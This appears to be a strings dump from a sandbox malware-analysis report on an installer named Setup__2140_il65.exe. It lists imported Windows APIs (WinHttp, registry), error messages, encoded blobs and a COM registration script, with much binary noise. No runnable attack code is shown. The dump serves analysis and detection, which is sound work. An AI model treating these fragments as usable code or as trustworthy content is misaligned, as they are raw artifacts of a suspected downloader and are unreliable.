
.PjRW

1.2.8

GetProcessWindowStation

operator

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

115 115 15 26 124 30 115 85

113 127 13 27 75 23 88 101 6

112 82 42 76 58 85 83 122 15

112 95 37

112 115 23 59 75

112 115 23 47 97 3 82 122

123 121 2 27 65 24 88 120 34

123 121 2 27 65 24 88 120 52

89 98 7 19 100 85 83 122 15

89 101 15 16 103 16 66 102

88 122 6 76 58 85 83 122 15

101 115 2 27 78 18 91 115

101 115 15 26 105 8 82 82 32

68 100 21

96 100 10 11 109 61 94 122 6

64 100 8 12 124

KERNEL32.dll

GetProcessHeap

GetCPInfo

zcÃ

.sYPELN

.Hfs-

%\sA.br

sG%F`l

k.gJw

H%UtC

pz.rSDz

#.mlz

j%u5Q

dO~.gnM

.Ng)Gy:o

PX'.RS>

A!N%d)

YSshqh

2.PAP

al0f

%fTeN

7*1%x

XG.bK

.Ap 6

.uE=z)

y%xv/

?b.hUuF3

.SRR*

%UT o

.PdbRH

9604604

hFAÃ’J

.wrCc

TV%%Ux

4..Sp

J[%Um

.Vj3b

>.QXlQ

^P.em

.pfm(

}V%%U

^kG%D

HHB.HHB.

1-2

6l6P6A

11F1X1d1q1

1 141:1\1

2'252?2[2`2

> ?7?@?|?

8&9-949@9

9(9,989@9\9|9

Cmscoree.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

kernel32.dll

ADVAPI32.DLL

USER32.DLL

portuguese-brazilian

109 90 121

103 67 12

122 93 120

126 74 111 105 70 68 104

16 103 70 92 111 97 67 113

126 106 79 73 70 100 72

125 82 105 105

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe

3.21.12.38

bor.exe

Setup__2140_il65.exe_1408_rwx_02480000_000B3000:

.text

`.rdata

@.data

.rsrc

@.reloc

j5SSh

8%uEP3

xSSSh

FTPjKS

FtPj;S

C.PjRV

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

WinHttpSetStatusCallback

t/lURlhE7oHSekJAUfGI1XZRfHbqjOY=

Failed to get the Temp folder: %d

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

sNRhTgJj9pbUckcMdOyB0GdGSDe7gLs=

CInstallationManager::IsPartOfInstallation value=%s

CInstallationManager::SetComponentInstallationEnded %S

%Y-%m-%d %H:%M:%S

CProgressUpdateRequest::CreateInstance %S

CProgressUpdateRequest::ProgressUpdate %S

Send progress update request %s

Progress Request for '%S' return %s

t/lURlhH/5DZVVFDeteg/XpQWEA=

q8F2TXxl8YfUYFAARuuBw2plWXvytMN8QElk7a3cckRJWf J1EQPb2X7hcV2d0N48ozUf1MfJc2K0GNQRHjqyOFhTE9y7ZeCIW1Jb qznUNRQ3T7l8IgEWp 7JfFRA9veO6d93pPSUCyoNR/Rlhy2I3ddnQAWvGS1FVKQHLJyPJhRk1j 7DZYUZNc7Kj1Gd1SWXtjd59ZlRAsrfUZ2ZCYfeW3n1OSXnqstBhSk118oHmP2RJY8qB3GNzTWP2s51ESkhy3YzQYXdDWuuIxXphVWP7yPZ2V2F4 pHddmVFe/uq0H5GezvZgcVGUEll2oHXclZAY8ut/XJNS2L/g9Q/YF5y/5DUV0pecv2Q3mFaezvZgcVVSkBy35DFYUpOYuqBwkQPf3Lqoth/Rm1j6pbYcVZYcu2znURCRWPYi8NeVkBj95TddmxOffuHxWAPb3vxl9RbQkJz8oGdUFFJduqB9GVGQmPJyOJ2V2lh 4rFP3FJZPuQ9GVGQmOys9B6V2p47LfYfURActGG23ZAWDvMgd12Ql9y05HFdlsAWO6B30NRQ3T7l8I/YF5y/5DUXlZYcuaznVRGWEP7icFVSkBy0IXcdnQAUPKL03JPamX7gZ1URlhb/5fFVlFeeOzI9nZXaW/3kPJ8R0lH7IvSdlBfO9GRxWNWWFP7hsR0cFhl94rWUg9pb 6F33dmQmH3lt59Tkl56rfFYUpCcO2znVBRSXbqgfd6T0lA

%c%c%c%c

VERSION.dll

KERNEL32.dll

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

Secur32.dll

WinHttpCloseHandle

WinHttpOpen

WinHttpSetOption

WinHttpGetProxyForUrl

WinHttpCrackUrl

WinHttpConnect

WinHttpOpenRequest

WinHttpSetStatusCallback

WinHttpSendRequest

WinHttpQueryHeaders

WinHttpQueryDataAvailable

WinHttpReadData

WinHttpReceiveResponse

WINHTTP.dll

GetProcessHeap

GetCPInfo

zcÃ

.?AVAsyncWinHttp@@

.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AUISupportErrorInfo@@

.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@

?456789:;

!"#$%&'()* ,-./0123

carpel.groveled.1 = s 'Inst Class'

CLSID = s '{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}'

carpel.groveled = s 'Inst Class'

CurVer = s 'carpel.groveled.1'

ForceRemove {320195d8-a8c1-4b82-b50e-6e2fe7b25b99} = s 'Inst Class'

ProgID = s 'carpel.groveled.1'

VersionIndependentProgID = s 'carpel.groveled'

val ServerExecutable = s '%MODULE_RAW%'

TypeLib = s '{b5becdeb-e2ba-4f85-ae0b-37cb4d093da2}'

.sssh

REÃš

\.crr

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps